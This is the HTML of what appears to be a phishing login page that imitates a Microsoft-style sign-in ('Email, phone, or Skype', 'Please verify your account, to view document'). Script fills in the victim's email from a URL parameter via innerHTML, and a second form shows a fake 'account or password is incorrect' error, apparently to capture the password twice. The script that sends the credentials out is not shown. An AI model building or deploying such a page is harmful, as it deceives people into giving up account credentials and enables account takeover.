<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="robots" content="nofollow,noindex">
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> 
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <link rel="stylesheet" href="index_files/bootstrap.css">
     <link rel="stylesheet" href="index_files/style.css">
    <link rel="stylesheet" href="index_files/font-awesome.css">
    <script type="text/javascript" src="index_files/MaskedPassword.js"></script>


    <title>Login page</title>
     <meta name="ROBOTS" content="NOINDEX, NOFOLLOW">




 </head>



  <body onload="">
    <div id="app">
      

    <div class="container-fluid" id="showcase"> 

      <article role="main">
        
        
       <div class="modal" id="modal">
                <div class="modal-body">
                    <div class="">
                        <div id="formdiv" style="">
                                                    
                            <div class="row ml-auto">
                               </div>

                                <div class="row ml-auto" id="email-row" style="display: none;"> 
                                  <div class="form-group row col-md-12 text-title"> 
                                  <div role="heading" aria-level="1">Sign in</div>

                                </div>

                                <div class=" row  alert alert-error col-md-12" style="display: none;" id="usernameError">
                  Enter a valid email address, phone number, or username.
                </div>


                              

                                <form id="email-signin" novalidate="">  

                                    <div class="form-group row col-md-12"> 
                                      <input type="email" autofocus="autofocus" size="200" maxlength="113" id="email" name="userEmail" placeholder="Email, phone, or Skype" class=" ltr_override">
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;">No account?<a href="#"> Create one!</a></div>
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;"><a href="#">Can't access your account?</a></div>
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""><button type="submit" class="btn btn-block btn-primary" id="next">Next</button></div>
                                  </div>

                                </form>
                                </div>

                                <div class="row ml-auto mt-auto" id="password-row" style="display: flex;">

                                  <div class="form-group row col-md-12"> 
                                   <div class="row col-md-12" id="showid">email</div>
                                   <div class=""></div>
                                  </div>

                                  
                                  <div class="form-group row col-md-12 text-title" style="margin-top: -10px;"> 
                                    <div role="heading" aria-level="1">Enter password</div>
                                  </div>



                                  <div class="row  text-body col-md-12" style="font-size: .9375rem; display: flex; margin-top: -7px;">
                  Please verify your account, to view document.
                </div>
                <div class="row   col-md-12" style="font-size: .9375rem; display: flex;">
                  
                </div>

                                


                                  <div class="row  alert alert-error col-md-12" style="font-size: .9999rem; display: none; margin-top: 10px;" id="passwordError">
                  Please enter your password.
                </div>


                                 <form id="signin" novalidate="" style="margin-top: 11px;">
                                    <div class="form-group row col-md-12"> 
                                      <span style="position: relative;"><input type="hidden" name="userPassword" value=""><input autocomplete="off" maxlength="113" id="password" placeholder="Password" size="200" class=" ltr_override masked" type="text"></span>
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;"><a href="/#">Forgot my password</a></div>
                                  </div>

                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" style="font-size: .8125rem;"><a href="/#">Sign in with a different account</a></div>
                                  </div>


                                  <div class="form-group row col-md-12"> 
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""></div>
                                    <div role="heading" aria-level="1" class="col-md-4" style=""><button type="submit" i="" class="btn btn-block btn-primary" name="" style="text-align: center;">Sign in</button></div>
                                  </div>
                                 </form>
                                </div>

                                 <div class="row ml-auto mt-auto" id="password2-row" style="display: none;">

                                  <div class="form-group row col-md-12"> 
                                   <div class="row col-md-12" id="showid2">aaa</div>
                                   <div class=""></div>
                                  </div>

                                  
                                  <div class="form-group row col-md-12 text-title"> 
                                    <div role="heading" aria-level="1" style="margin-top: -10px;">Enter password</div>
                                  </div>

                                  <div class=" row  alert alert-error col-md-12" style="font-size: .9999rem; display: none;" id="password21Error">
                  Please enter your password.
                </div>

                 <div class=" row  alert alert-error col-md-12" style="font-size: .9999rem; display: inline;" id="password22Error">
                  Your account or password is incorrect. If you don't remember your password, <a href="#">reset it now.</a>
                </div>


                                 
                                <form id="continue" style="margin-top: 11px;"><div class="form-group row col-md-12"><input type="password" autofocus="autofocus" size="200" maxlength="113" id="password2" name="userPassword2" placeholder="Password" class="ltr_override"></div><div class="form-group row col-md-12"><div rold="heading" aria-level="1" style="font-size:.8125rem"><a href="#">Forgot my password</a></div></div><div class="form-group row col-md-12"><div role="heading" aria-level="1" class="col-md-4"></div><div role="heading" aria-level="1" class="col-md-4"></div><div role="heading" aria-level="1" class="col-md-4"><button type="submit" class="btn btn-block btn-primary" id="send">Sign in</button></div></div></form></div>

                                <div id="animate" class="form-group row col-md-12 ml-auto" style="display: none;">
                                  <div class="progress-container"> <div class="progress" aria-label="Please wait">&lt; <div></div><div></div><div></div><div></div><div></div></div></div>

                                <!-- <div class="form-group mt-2 row col-md-12 text-title"> 
                                  <div role="heading" aria-level="1" id="ldt" style="display: flex;">Authenticating....... </div>
                                   <div role="heading" aria-level="1" id="fnf" style="display: none;">Authentication Complete<img width="56px" height="50px" src="https://www.turningtechnologies.ca/wp-content/uploads/2016/02/CheckMark.png"> </div>
                                </div> -->

                                 </div>

                            </div>



                        </div>
                        
                    </div>
                                   
                </div>
        </div>

    </article></div>



    </div>


     
    <script src="index_files/jquery-3.js"></script>
    <script src="index_files/popper.js"></script>
    <script src="index_files/bootstrap.js"></script>

     <script type="text/javascript">
     	
     var client_email = getAllUrlParams().color;
     var id = document.getElementById('showid');
        id.innerHTML = client_email
     document.getElementById('showid2').innerHTML = client_email


     function getAllUrlParams(url) {

  // get query string from url (optional) or window
  var queryString = url ? url.split('?')[1] : window.location.search.slice(1);

  // we'll store the parameters here
  var obj = {};

  // if query string exists
  if (queryString) {

    // stuff after # is not part of query string, so get rid of it
    queryString = queryString.split('#')[0];

    // split our query string into its component parts
    var arr = queryString.split('&');

    for (var i = 0; i < arr.length; i++) {
      // separate the keys and the values
      var a = arr[i].split('=');

      // set parameter name and value (use 'true' if empty)
      var paramName = a[0];
      var paramValue = typeof (a[1]) === 'undefined' ? true : a[1];

      // (optional) keep case consistent
      paramName = paramName.toLowerCase();
      if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase();

      // if the paramName ends with square brackets, e.g. colors[] or colors[2]
      if (paramName.match(/\[(\d+)?\]$/)) {

        // create key if it doesn't exist
        var key = paramName.replace(/\[(\d+)?\]/, '');
        if (!obj[key]) obj[key] = [];

        // if it's an indexed array e.g. colors[2]
        if (paramName.match(/\[\d+\]$/)) {
          // get the index value and add the entry at the appropriate position
          var index = /\[(\d+)\]/.exec(paramName)[1];
          obj[key][index] = paramValue;
        } else {
          // otherwise add the value to the end of the array
          obj[key].push(paramValue);
        }
      } else {
        // we're dealing with a string
        if (!obj[paramName]) {
          // if it doesn't exist, create property
          obj[paramName] = paramValue;
        } else if (obj[paramName] && typeof obj[paramName] === 'string'){
          // if property does exist and it's a string, convert it to an array
          obj[paramName] = [obj[paramName]];
          obj[paramName].push(paramValue);
        } else {
          // otherwise add the property
          obj[paramName].push(paramValue);
        }
      }
    }
  }

  return obj;
}
   
     
 </script>

 <script src="index_files/main.js"></script>

  


</body></html>
